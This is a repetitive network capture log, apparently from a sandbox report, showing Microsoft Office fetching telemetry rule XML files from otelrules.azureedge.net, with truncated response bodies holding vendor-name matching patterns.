                                                                                Content-Type: text/xml
                                                                                Content-Length: 468
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                ETag: "0x8DC582BB046B576"
                                                                                x-ms-request-id: 8789ddbb-a01e-0084-6a8c-159ccd000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093357Z-15767c5fc55whfstvfw43u8fp40000000cf0000000005nx7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:57 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                42 | 192.168.2.5 | 55419 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:57 UTC | 192 | OUT | GET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:57 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:57 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 404
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                ETag: "0x8DC582B95C61A3C"
                                                                                x-ms-request-id: 0dcb6c6d-e01e-0003-668c-150fa8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093357Z-15767c5fc55v7j95gq2uzq37a00000000cmg000000003hpw
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:57 UTC | 404 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                43 | 192.168.2.5 | 55417 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:33:57 UTC | 192 | OUT | GET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:57 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:57 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 478
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                ETag: "0x8DC582B9B233827"
                                                                                x-ms-request-id: 4da5bf60-a01e-0070-668c-15573b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093357Z-15767c5fc55rg5b7sh1vuv8t7n0000000cm0000000009bw4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:57 UTC | 478 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                                                44            192.168.2.5    55422          13.107.246.60     443
                                                                                Timestamp                  Bytes transferred    Direction    Data
                                                                                2024-10-04 09:33:58 UTC    192                  OUT          GET /rules/rule120645v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC    470                  IN           HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:58 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 425
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                ETag: "0x8DC582BBA25094F"
                                                                                x-ms-request-id: 3a0dcc46-601e-0032-6c8c-15eebb000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093358Z-15767c5fc554l9xf959gp9cb1s00000006g0000000005nwp
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC    425                  IN           Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                                                                Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                                                45            192.168.2.5    55423          13.107.246.60     443
                                                                                Timestamp                  Bytes transferred    Direction    Data
                                                                                2024-10-04 09:33:58 UTC    192                  OUT          GET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC    470                  IN           HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:58 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 475
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                ETag: "0x8DC582BB2BE84FD"
                                                                                x-ms-request-id: 15fe0b87-a01e-0002-3b8c-155074000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093358Z-15767c5fc55v7j95gq2uzq37a00000000chg000000005vr2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC    475                  IN           Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                                                46            192.168.2.5    55424          13.107.246.60     443
                                                                                Timestamp                  Bytes transferred    Direction    Data
                                                                                2024-10-04 09:33:58 UTC    192                  OUT          GET /rules/rule120647v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC    470                  IN           HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:58 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 448
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                ETag: "0x8DC582BB389F49B"
                                                                                x-ms-request-id: 1f480944-c01e-002b-018c-156e00000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093358Z-15767c5fc55sdcjq8ksxt4n9mc00000001n0000000006wsx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC    448                  IN           Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                                                                Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                                                47            192.168.2.5    55429          13.107.246.60     443
                                                                                Timestamp                  Bytes transferred    Direction    Data
                                                                                2024-10-04 09:33:58 UTC    192                  OUT          GET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC    470                  IN           HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 491
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                ETag: "0x8DC582B98B88612"
                                                                                x-ms-request-id: c54fbac1-901e-008f-588c-1567a6000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55d6fcl6x6bw8cpdc0000000cb0000000000q0g
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC    491                  IN           Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                                                48            192.168.2.5    55431          13.107.246.60     443
                                                                                Timestamp                  Bytes transferred    Direction    Data
                                                                                2024-10-04 09:33:59 UTC    192                  OUT          GET /rules/rule120649v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC    470                  IN           HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 416
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                                                                ETag: "0x8DC582BAEA4B445"
                                                                                x-ms-request-id: 75858473-001e-000b-318c-1515a7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55sdcjq8ksxt4n9mc00000001rg0000000023da
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC    416                  IN           Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                                                49            192.168.2.5    55435          13.107.246.60     443
                                                                                Timestamp                  Bytes transferred    Direction    Data
                                                                                2024-10-04 09:33:59 UTC    192                  OUT          GET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC    470                  IN           HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 479
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                ETag: "0x8DC582B989EE75B"
                                                                                x-ms-request-id: 76252b1b-c01e-0066-488c-15a1ec000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55xsgnlxyxy40f4m00000000c70000000006vfc
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC    479                  IN           Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                                                50            192.168.2.5    55436          13.107.246.60     443
                                                                                Timestamp                  Bytes transferred    Direction    Data
                                                                                2024-10-04 09:33:59 UTC    192                  OUT          GET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC    470                  IN           HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 471
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                ETag: "0x8DC582B97E6FCDD"
                                                                                x-ms-request-id: b83a8dc4-f01e-003f-308c-15d19d000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55rv8zjq9dg0musxg0000000ca0000000006pdg
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC    471                  IN           Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                                                51            192.168.2.5    55437          13.107.246.60     443
                                                                                Timestamp                  Bytes transferred    Direction    Data
                                                                                2024-10-04 09:33:59 UTC    192                  OUT          GET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC    470                  IN           HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 415
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                x-ms-request-id: b9a197f6-401e-0078-3b8c-154d34000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55kg97hfq5uqyxxaw0000000ceg000000000qbu
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC    415                  IN           Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                Session ID    Source IP      Source Port    Destination IP    Destination Port
                                                                                52            192.168.2.5    55438          13.107.246.60     443
                                                                                Timestamp                  Bytes transferred    Direction    Data
                                                                                2024-10-04 09:33:59 UTC    192                  OUT          GET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:33:59 UTC    470                  IN           HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:33:59 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                ETag: "0x8DC582B9C710B28"
                                                                                x-ms-request-id: 2f8443ca-b01e-0070-308c-151cc0000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093359Z-15767c5fc55n4msds84xh4z67w0000000630000000002ee4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:33:59 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                53 | 192.168.2.5 | 55439 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:00 UTC | 192 | OUT | GET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:00 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:00 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 477
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                ETag: "0x8DC582BA54DCC28"
                                                                                x-ms-request-id: 7be6812e-d01e-008e-528c-15387a000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093400Z-15767c5fc55fdfx81a30vtr1fw0000000chg00000000c3zq
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:00 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                54 | 192.168.2.5 | 55440 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:00 UTC | 192 | OUT | GET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:00 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:00 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                ETag: "0x8DC582BB7F164C3"
                                                                                x-ms-request-id: 1f480aea-c01e-002b-028c-156e00000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093400Z-15767c5fc554wklc0x4mc5pq0w0000000cm0000000008uhv
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:00 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                55 | 192.168.2.5 | 55441 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:00 UTC | 192 | OUT | GET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:00 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:00 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 477
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                ETag: "0x8DC582BA48B5BDD"
                                                                                x-ms-request-id: 7be6821c-d01e-008e-398c-15387a000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093400Z-15767c5fc55rg5b7sh1vuv8t7n0000000csg0000000019gx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:00 UTC | 477 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                56 | 192.168.2.5 | 55443 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:00 UTC | 192 | OUT | GET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:00 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:00 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 472
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                ETag: "0x8DC582BB650C2EC"
                                                                                x-ms-request-id: aa883537-b01e-0053-4c8c-15cdf8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093400Z-15767c5fc55fdfx81a30vtr1fw0000000cn0000000008skr
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:00 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                57 | 192.168.2.5 | 55442 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:00 UTC | 192 | OUT | GET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:00 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:00 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                ETag: "0x8DC582B9FF95F80"
                                                                                x-ms-request-id: 16d3a614-701e-0032-288c-15a540000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093400Z-15767c5fc554wklc0x4mc5pq0w0000000ct00000000009ek
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:00 UTC | 419 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                58 | 192.168.2.5 | 55446 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:01 UTC | 192 | OUT | GET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:01 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:01 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 468
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                ETag: "0x8DC582BB3EAF226"
                                                                                x-ms-request-id: cce0beff-001e-0082-398c-155880000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093401Z-15767c5fc55xsgnlxyxy40f4m00000000c7g0000000063qn
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:01 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                59 | 192.168.2.5 | 55448 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:01 UTC | 192 | OUT | GET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:01 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:01 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 485
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                ETag: "0x8DC582BB9769355"
                                                                                x-ms-request-id: dc68dac5-201e-006e-298c-15bbe3000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093401Z-15767c5fc55852fxfeh7csa2dn0000000c600000000093he
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:01 UTC | 485 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                60 | 192.168.2.5 | 55450 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:01 UTC | 192 | OUT | GET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
